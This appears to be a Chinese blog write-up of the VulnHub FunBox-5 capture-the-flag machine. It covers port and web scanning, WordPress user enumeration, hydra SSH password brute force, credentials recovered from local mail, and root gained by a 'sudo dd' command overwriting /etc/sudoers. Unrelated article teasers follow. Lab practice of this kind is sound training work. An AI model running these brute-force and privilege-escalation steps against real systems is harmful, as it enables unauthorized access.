vulnhub靶场之FunBox-5

news2024/11/18 0:38:11

一.环境搭建

1.靶场描述

Lets separate the script-kids from script-teenies.

Hint: The first impression is not always the right one!

If you need hints, call me on twitter: @0815R2d2 Have fun...

This works better with VirtualBox rather than VMware

This works better with VirtualBox rather than VMware.

2.靶场下载

https://www.vulnhub.com/entry/funbox-next-level,547/

image-20240505210150176

3.靶场启动

image-20240505210220611

二.信息收集

1.探测IP地址

nmap -sP 192.168.2.0/24

image-20240505210631152

arp-scan -l

image-20240505210650840

我们探测出来IP地址为192.168.2.8

2.探测端口及服务

nmap -p- -sV 192.168.2.8

image-20240505211214614

开启了80端口,服务为Apache2
开启了22端口,服务为ssh

通过端口我们可以知道,又是ssh登录

三.渗透测试

1.访问web服务

http://192.168.2.8

image-20240505211508157

可以看到是一个apache2页面

2.扫描web服务

1)nikto扫描网站结构

nikto -h http://192.168.2.8

image-20240505211735325

扫描到一个robots.txt敏感目录

2)dirsearch扫描

这里IP地址变为192.168.2.9
dirsearch -u http://192.168.2.9 -e * -x 403 --random-agent

image-20240505212342222

扫描出来一个http://192.168.2.9/drupal

3)dirb扫描

dirb http://192.168.2.9

image-20240505212903776

3.渗透测试

1)访问robots.txt

http://192.168.2.9/robots.txt

image-20240505213108046

http://192.168.2.9/Thinking

image-20240505213143759

没有任何有用的信息

2)访问drupal目录

http://192.168.2.9/drupal

image-20240505213436812

我们发现重定向了192.168.178.33,没有什么用,我们进行扫描drupal试试

image-20240505214734508

我们可以看到cms是wordpress,那么我们使用wpscan进行爆破,因为开启了22端口,我们可以进行ssh登录

3)wpscan爆破

wpscan –url http://192.168.2.9/drupal/index.php –wp-content-dir=http://192.168.2.8/drupal/wp-content/ -e

image-20240505215430043

我们可以看到爆破出来2个用户名,一个是admin,一个是ben

4)hydra爆破

hydra -l admin -P  /usr/share/wordlists/rockyou.txt  ssh://192.168.2.9

image-20240505215553186

我们可以看到爆破不出来,那么我们爆破另一个

hydra -l ben -P  /usr/share/wordlists/rockyou.txt  ssh://192.168.2.9

image-20240505215603591

爆破出来密码是pookie

5)ssh登录

ssh ben@192.168.2.9

image-20240505215848216

我们可以看到登录成功

我们在根目录下可以看到mail目录,但是里面的文件我们没有权限查看

image-20240505220022514

image-20240505221052245

提权也提权不了,我们换一个思路

6)邮件服务

发现 ben 用户在 mail 组中 会不会有邮件发服务呢 netstart -anpt

image-20240505220408960

我们可以看到110端口是开放的吗,我们使用110端口进行查看

现存在邮件服务 通过110端口 连接本地 telnet 127.0.0.1 110发现可以, 而且有三封信 发现账号密码:adam/qwedsayxc!

image-20240505220805479

image-20240505220859984

image-20240505220915396

我们使用adam进行登录

ssh adam@192.168.2.9

image-20240505221713112

我们可以看到登录成功

7)提权

切换用户查看权限 id发现在sudo组 查看sudo -l发现了dd,de,df都可以sudo提权 只有dd可以使用

image-20240505221921830

提权方法查询网站:GTFOBins

image-20240505221959108

该命令可以写入具有root权限的文件,执行命令进行写入文件/etc/sudoers,设置adam用户具有全部的特权命令

LFILE=/etc/sudoers
echo "adam    ALL=(ALL:ALL) ALL" | sudo dd of=$LFILE

image-20240505222138478

可以使用find命令进行提权,提权成功

image-20240505222232759

获取flag

image-20240505222354615

至此获取到了所有得flag,渗透测试结束。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1665074.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

git 推送github 选https遇到登录 openSSH问题

git 推送github 选https遇到登录 openSSH问题

使用https需要使用github令牌token作为密码, 使用SSH不需要登录。 还有一个问题: 创建github仓库后没有quick setup页面解决办法 千万不要点击任何多的操作!!!输入仓库名,直接create!&#x…
阅读更多...
基于CCS5.5的双音多频(DTMF)信号检测仿真实验(①检测型音频文件②输入生成音频并检测)

基于CCS5.5的双音多频(DTMF)信号检测仿真实验(①检测型音频文件②输入生成音频并检测)

DTMF的优点 我们知道,DTMF根本上仍然是频谱分析,基础还是DFT,但DFT通常需要对一整段数据做变换,而DTMF不同,每输入一个采样点就计算一次,更有利于硬件实现。 基于CCS的双音多频(DTMF)信号检测原理 公式详细推导 详细的公式推导在下面这篇博客中已经进行了详细的描述,…
阅读更多...
现场工程师出手--虚拟化软件预留内存过大导致其他程序崩溃问题

现场工程师出手--虚拟化软件预留内存过大导致其他程序崩溃问题

项目场景: 一位学生有一台笔记本电脑,安装了Android,Kafka虚拟机很多软件。笔记本配置了20GB内存,固态硬盘,但最近很卡,Android Stuido经常闪退,一些游戏也无法运行。 问题描述 由于Android S…
阅读更多...
共用nacos造成的开发问题记录

共用nacos造成的开发问题记录

目录 1.需求提出 2.系统架构 3.问题抛出 4.解决办法 1.配置私有命名空间 2.给服务加后缀 1.需求提出 本地调试用到哪个服务启动哪个服务,其他支持服务调用测试环境上的,目的是避免本地启动多个服务,消耗电脑配置。 2.系统架构 项目是…
阅读更多...
共绘财富管理新蓝图,ATFX赞助出席拉美峰会,引领家族资本新航向

共绘财富管理新蓝图,ATFX赞助出席拉美峰会,引领家族资本新航向

全球新兴市场中,拉丁美洲以其非凡活力与潜力格外引人注目,成为全球资本竞相追逐的价值洼地。ATFX自2019年开设墨西哥办事处以来,持续深耕拉美市场已成为头部品牌。自4月行业资深人士Ergin Erdemir掌舵拉美业务后,掀起市场营销新浪…
阅读更多...
数据库调优-连接池优化

数据库调优-连接池优化

先贴下连接池的相关配置: 连接池参数配置: 字段含义Max Number of Connections最大连接数;做性能测试时,可以填 0 。在开发的项目中按实际代码填写,默认是 20 。Max Wait(ms)在连接池中取回连接最大等待时间&#xf…
阅读更多...
SP-01NM7电动机保护器 施耐德 EOCR-SP

SP-01NM7电动机保护器 施耐德 EOCR-SP

EOCR-SP-01NM7电动机保护器品牌:施耐德 名称:电机保护器 型号:EOCRSP-01NF7密集型设计 ■电子式多保护功能 宽的电流调整范围(10:1) EOCR主要产品有电子式电动机保护继电器,电子式过电流继电器,电子式欠电流继电器,电子式欠电压继电器&a…
阅读更多...
ASME美国机械工程师学会文献如何查询下载经验分享

ASME美国机械工程师学会文献如何查询下载经验分享

一、ASME美国机械工程师学会数据库简介: ASME是世界上最大的技术出版机构之一,制定众多的工业和制造业行业标准。现在ASME拥有工业和制造行业的600项标准和规范,这些标准在全球90多个国家被采用。 ASME数据库包含25种专业期刊,其…
阅读更多...
Spring-Bean 作用域

Spring-Bean 作用域

作用域 作用域案例 public class BeanScopeDemo {AutowiredQualifier("singletonPerson")Person person;AutowiredQualifier("prototypePerson")Person person1;AutowiredQualifier("prototypePerson")Person person2;AutowiredSet<Person&g…
阅读更多...
第41天:WEB攻防-ASP应用HTTP.SYS短文件文件解析Access注入数据库泄漏

第41天:WEB攻防-ASP应用HTTP.SYS短文件文件解析Access注入数据库泄漏

第四十一天 一、ASP-SQL注入-Access数据库 1.解释 ACCESS数据库无管理帐号密码&#xff0c;顶级架构为表名&#xff0c;列名&#xff08;字段&#xff09;&#xff0c;数据&#xff0c;所以在注入猜解中一般采用字典猜解表和列再获取数据&#xff0c;猜解简单但又可能出现猜解…
阅读更多...
有哪些高性价比的开放式耳机推荐?五款超好用的耳机推荐

有哪些高性价比的开放式耳机推荐?五款超好用的耳机推荐

近年来&#xff0c;开放式耳机受到了越来越多人的关注&#xff0c;特别是对于运动爱好者来说&#xff0c;在运动的过程中&#xff0c;传统的有线耳机不适合户外运动&#xff0c;不仅佩戴不稳&#xff0c;线还容易缠绕&#xff0c;而普通的蓝牙耳机长时间佩戴会感觉耳朵不适。在…
阅读更多...
分享5个免费AI写作软件

分享5个免费AI写作软件

在数字化时代&#xff0c;人工智能&#xff08;AI&#xff09;正以惊人的速度渗透到我们生活的方方面面&#xff0c;而写作领域也不例外。AI写作工具的出现&#xff0c;不仅改变了传统的写作流程&#xff0c;更在创意表达、文本生成、语言校正等方面展现了其独特的优势。这些工…
阅读更多...
构建无服务器数仓(二)Apache DolphinScheduler 集成以及 LOB 粒度资源消费分析

构建无服务器数仓(二)Apache DolphinScheduler 集成以及 LOB 粒度资源消费分析

引言 在数据驱动的世界中&#xff0c;企业正在寻求可靠且高性能的解决方案来管理其不断增长的数据需求。本系列博客从一个重视数据安全和合规性的 B2C 金融科技客户的角度来讨论云上云下混合部署的情况下如何利用亚马逊云科技云原生服务、开源社区产品以及第三方工具构建无服务…
阅读更多...
12个网上赚钱野路子信息差,人人可做的赚钱小项目!

12个网上赚钱野路子信息差,人人可做的赚钱小项目!

在这个多元化的时代&#xff0c;副业已经成为许多人增加收入、实现自我价值的重要途径。今天&#xff0c;我们就来聊聊那些既有趣又能赚钱的副业项目&#xff0c;让你的钱包鼓起来&#xff01; 1.文字创作 写作不仅是情感的宣泄&#xff0c;更是财富的积累。无论是自媒体文、软…
阅读更多...
ISIS学习二——与OSPF相比的ISIS报文以及路由计算

ISIS学习二——与OSPF相比的ISIS报文以及路由计算

目录 一.ISIS支持的网络类型 1.OSPF支持 2.ISIS支持 二.ISIS最优路径的选取 &#xff08;1&#xff09;.ISIS开销值设置 1.全局开销 2.接口开销 3.根据带宽设置开销 &#xff08;2&#xff09;.ISIS的次优路径 三.ISIS报文格式 1.ISIS专用报头——TLV 2.ISIS通用头…
阅读更多...
传输层之 UDP 协议

传输层之 UDP 协议

UDP协议端格式 教科书上的&#xff1a; 16位UDP长度&#xff0c;表示整个数据报&#xff08;UDP首部UDP数据&#xff09;的最大长度&#xff0c;描述了这个数据报多长&#xff1b; 实际上的&#xff1a; UDP 会把载荷数据&#xff0c;就是通过 UDP Socket&#xff0c;即 sen…
阅读更多...
第十二届蓝桥杯省赛真题 Java B 组【原卷】

第十二届蓝桥杯省赛真题 Java B 组【原卷】

文章目录 发现宝藏【考生须知】试题 A: ASC试题 B : 卡片试题 C: 直线试题 D: 货物摆放试题 E: 路径试题 F: 时间显示试题 G: 最少砝码试题 H: 杨辉三角形试题 I: 双向排序试题 J: 括号序列 发现宝藏 前些天发现了一个巨牛的人工智能学习网站&#xff0c;通俗易懂&#xff0c;…
阅读更多...
Flink DataSink介绍

Flink DataSink介绍

介绍 Flink DataSink是Apache Flink框架中的一个重要组件&#xff0c;它定义了数据流经过一系列处理后最终的输出位置。以下是关于Flink DataSink的详细介绍&#xff1a; 概念&#xff1a;DataSink主要负责对经过Flink处理后的流进行一系列操作&#xff0c;并将计算后的数据结…
阅读更多...
C语言例题36、判断一个数是否是回文数

C语言例题36、判断一个数是否是回文数

题目要求&#xff1a;输入一个5位数&#xff0c;判断它是不是回文数。即12321是回文数 #include <stdio.h>int main() {int x;int ge, shi, qian, wan;printf("请输入一个5位数&#xff1a;");scanf("%d", &x);ge x % 10; //个sh…
阅读更多...
网络运维故障排错思路!!!!!(稳了!!!)

网络运维故障排错思路!!!!!(稳了!!!)

1 网络排错的必备条件 为什么要先讲必备条件&#xff1f;因为这里所讲的网络排错并不仅仅是停留在某一个小小命令的使用上&#xff0c;而是一套系统的方法&#xff0c;如果没有这些条件&#xff0c;我真的不能保证下面讲的这些你可以听得懂&#xff0c;并且能运用到实际当中&a…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023